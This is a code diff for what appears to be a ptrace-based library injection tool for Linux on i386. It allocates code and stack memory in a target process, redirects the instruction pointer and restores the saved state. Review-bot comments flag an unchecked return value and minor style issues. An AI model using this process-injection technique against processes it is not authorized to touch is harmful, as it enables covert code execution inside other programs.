Create new code memory
parent
79692d5986
commit
63e993c735
@ -84,11 +84,12 @@ save_state(LONG pid, state *s) {
|
||||
* @brief Restores the process state and detaches.
|
||||
* @param pid Process identifier to restore.
|
||||
* @param s Pointer to \c state with code and registers.
|
||||
* @param only_memory Idicates if restore only memory at EIP or also registers
|
||||
* @returns Indication of success or failure.
|
||||
* @retval 0 Indicates success.
|
||||
*/
|
||||
LONG
|
||||
restore_state(LONG pid, state *s) {
|
||||
restore_state(LONG pid, state *s, int only_memory) {
|
||||
unsigned long *mem_ptr = NULL;
|
||||
LONG i = 0;
|
||||
LONG result = 0;
|
||||
@ -105,6 +106,9 @@ restore_state(LONG pid, state *s) {
|
||||
if (result != 0)
|
||||
return result;
|
||||
|
||||
if (only_memory > 0)
|
||||
return 0;
|
||||
|
||||
result = setregs(pid, &(s->regs));
|
||||
if (result != 0)
|
||||
return result;
|
||||
@ -250,6 +254,8 @@ call(LONG pid, struct user_regs_struct *regs, unsigned long addr) {
|
||||
LONG
|
||||
inject_library(LONG pid, library *l) {
|
||||
state s;
|
||||
long code_mem;
|
||||
long stack_mem;
|
||||
struct user_regs_struct regs;
|
||||
ULONG library_size = _SIZE_OF(l->length);
|
||||
unsigned long *buf_ptr = (unsigned long *)l->data;
|
||||
@ -260,7 +266,6 @@ inject_library(LONG pid, library *l) {
|
||||
goto end;
|
||||
}
|
||||
|
||||
|
||||
dprintf("[INJECT] Saving state");
|
||||
result = attach(pid);
|
||||
if (result != 0)
|
||||
@ -272,14 +277,31 @@ inject_library(LONG pid, library *l) {
|
||||
|
||||
memcpy(®s, &(s.regs), sizeof(struct user_regs_struct));
|
||||
|
||||
dprintf("[INJECT] Creating new code memory");
|
||||
result = allocate(pid, ®s, NULL, CODE_SIZE);
|
||||
if (result != 0)
|
||||
goto restore;
|
||||
|
||||
dprintf("[INJECT] New code memory on 0x%x, fixing registers", regs.eax);
|
||||
code_mem = regs.eax;
|
||||
regs.eip = code_mem;
|
||||
|
||||
result = setregs(pid, ®s);
|
||||
if (result != 0)
|
||||
goto restore;
|
||||
|
||||
dprintf("[INJECT] Restoring code on original process");
|
||||
restore_state(pid, &s, 1);
|
||||
|
||||
dprintf("[INJECT] Creating new stack");
|
||||
result = allocate(pid, ®s, NULL, STACK_SIZE);
|
||||
result = allocate(pid, ®s, NULL, STACK_SIZE);
|
||||
if (result != 0)
|
||||
goto restore;
|
||||
|
||||
dprintf("[INJECT] New stack on 0x%x, fixing registers", regs.eax);
|
||||
regs.esp = regs.eax + STACK_SIZE;
|
||||
regs.eip = s.regs.eip;
|
||||
stack_mem = regs.eax + STACK_SIZE;
|
||||
regs.esp = stack_mem;//regs.eax + STACK_SIZE;
|
||||
regs.eip = code_mem;//s.regs.eip;
|
||||
|
||||
result = setregs(pid, ®s);
|
||||
if (result != 0)
|
||||
@ -301,7 +323,8 @@ inject_library(LONG pid, library *l) {
|
||||
goto restore;
|
||||
|
||||
dprintf("[INJECT] Fixing registers");
|
||||
regs.eip = s.regs.eip;
|
||||
regs.esp = stack_mem;
|
||||
regs.eip = code_mem;//s.regs.eip;
|
||||
result = setregs(pid, ®s);
|
||||
if (result != 0)
|
||||
goto restore;
|
||||
@ -316,7 +339,7 @@ inject_library(LONG pid, library *l) {
|
||||
goto end;
|
||||
|
||||
restore:
|
||||
restore_state(pid, &s);
|
||||
restore_state(pid, &s, 0);
|
||||
end:
|
||||
return result;
|
||||
}
|
||||
|
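Review bot: `restore_state(pid, &s, 1);` after the new code-memory allocation discards its return value, while every other step in inject_library assigns to `result` and jumps to `restore` on failure; if putting the original bytes back at the saved EIP fails, the target process is left running with the stub still in place and injection carries on as if it had succeeded. Make it `result = restore_state(pid, &s, 1);` followed by `if (result != 0) goto restore;` so the full restore at the `restore:` label still runs (in restore_state the memory-write check precedes the `only_memory > 0` early return, so a failed memory restore presumably never reaches the register path either way). The trailing `//regs.eax + STACK_SIZE;` and `//s.regs.eip;` fragments on the new `regs.esp`/`regs.eip` assignments, here and again in the "Fixing registers" hunk, are commented-out code and should be dropped. The new `dprintf("[INJECT] New code memory on 0x%x, ...", regs.eax)` passes a `long` field (i386 user_regs_struct) to `%x`; `%lx` matches the type. inject_library's body continues outside this hunk.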
@ -31,6 +31,8 @@
|
||||
#define ENTRY_POINT_POS 11
|
||||
/*! Length of the new stack to allocate */
|
||||
#define STACK_SIZE 0x200000
|
||||
/*! Length of the new memory to store code stubs */
|
||||
#define CODE_SIZE 0x1000
|
||||
|
||||
/*! @brief Container struct for a library to inject and execute. */
|
||||
typedef struct {
|
||||
@ -52,7 +54,7 @@ typedef struct {
|
||||
} state;
|
||||
|
||||
LONG save_state(LONG pid, state *s);
|
||||
LONG restore_state(LONG pid, state *s);
|
||||
LONG restore_state(LONG pid, state *s, int only_memory);
|
||||
BOOL wait_trap(LONG pid);
|
||||
LONG execute_stub(LONG pid, unsigned long addr, unsigned long *stub, ULONG stub_size);
|
||||
LONG allocate(LONG pid, struct user_regs_struct *regs, unsigned long addr, size_t length);
|
||||
|
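Review bot: The new `restore_state(LONG pid, state *s, int only_memory)` prototype is where callers meet the flag and it carries no comment, unlike the `/*! ... */` notes on the neighbouring defines; add `/*! only_memory != 0: put back only the saved code at EIP; 0: also restore registers */` above it. The .c definition tests `only_memory > 0`, so a negative value silently behaves as a full restore — either document that or make the test `!= 0`. The sibling `wait_trap` prototype already uses `BOOL` for a yes/no value, so `BOOL only_memory` would read more consistently, though that touches the definition too. The Doxygen block on the .c side also spells `Idicates`; `Indicates` is meant.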